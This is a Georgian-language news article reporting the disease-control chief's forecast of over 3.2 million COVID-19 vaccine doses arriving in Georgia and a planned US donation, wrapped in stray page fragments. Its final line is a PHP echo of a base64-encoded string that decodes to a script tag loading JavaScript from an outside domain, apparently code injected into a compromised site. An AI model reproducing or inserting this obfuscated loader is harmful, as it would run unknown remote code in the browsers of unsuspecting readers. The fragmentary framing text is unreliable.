celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის, ამირან გამყრელიძის განცხადებით, მომავალი 4 თვის განმავლობაში ქვეყანაში კორონავირუსის საწინააღმდეგო ვაქცინის 3,2 მილიონზე მეტი დოზა შემოვა.
 
მისივე თქმით, საქართველო ივლისიდან მასობრივ ვაქცინაციაზე უნდა გადავიდეს და დღეში 20-25 ათასი ადამიანი უნდა აიცრას.
 
„მოგეხსენებათ, ვაქცინებთან დაკავშირებით გლობალური დეფიციტია. აქამდე ქვეყანამ ვაქცინის 315 ათასი დოზა მიიღო, რომლის ადმინისტრირებაც ხდება. ივლისი-აგვისტო-სექტემბერი-ოქტომბერი უკვე გადაწყვეტილია, არსებობს ძალიან მაღალი დასტური, რომ დაახლოებით 3 მლნ 200 ათასზე მეტი ვაქცინის დოზა შემოვა“,-განაცხადა გამყრელიძემ.
 
მისივე თქმით, აშშ-დან საქართველო რამდენიმე ათეულ ათას დოზა ვაქცინას მიიღებს, თუმცა რომელ ვაქცინაზეა საუბარი ჯერ არ კონკრეტდება.
 
"ჩვენთვის და ჯანდაცვის სფეროსთვის ერთ-ერთი მხარდამჭერი არის აშშ--ს დავადებათა კონტროლის ცენტრი. აშშ-ს პრეზიდენტის გადაწყვეტილებაში საქართველო გამოჩნდა და ჩვენ მივიღებთ დიდი ალბათობით რამდენიმე ათეულ ათას დოზა ერთ-ერთი ამერიკული წარმოების ვაქცინას“-განაცხადა ამირან გამყრელიძემ.
 
შეგახსენებთ, თეთრი სახლის მიერ გაკეთებული განცხადების თანახმად, აშშ დანარჩენ მსოფლიოს პირველ ეტაპზე 25 მილიონ დოზა ვაქცინას გადასცემს. აღნიშნული ვაქცინების სულ მცირე 75% COVAX-პლატფორმის ფარგლებში სხვადასხვა ქვეყანას უნდა მიეწოდოს, ხოლო 25% გადაეცემა პირდაპირ იმ ქვეყნებს, რომლებსაც ვაქცინაცია სჭირდება.
 
CNN იტყობინება, რომ დაახლოებით, 6 მლნ დოზა გაიგზავნება საქართველოში, უკრაინაში, კოსოვოში, ჰაიტიში, ღაზის სექტორში, მექსიკაში, კანადაში, კორეის რესპუბლიკაში, ეგვიპტეში, ერაყში, იორდანიაში, იემენში.
1757
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");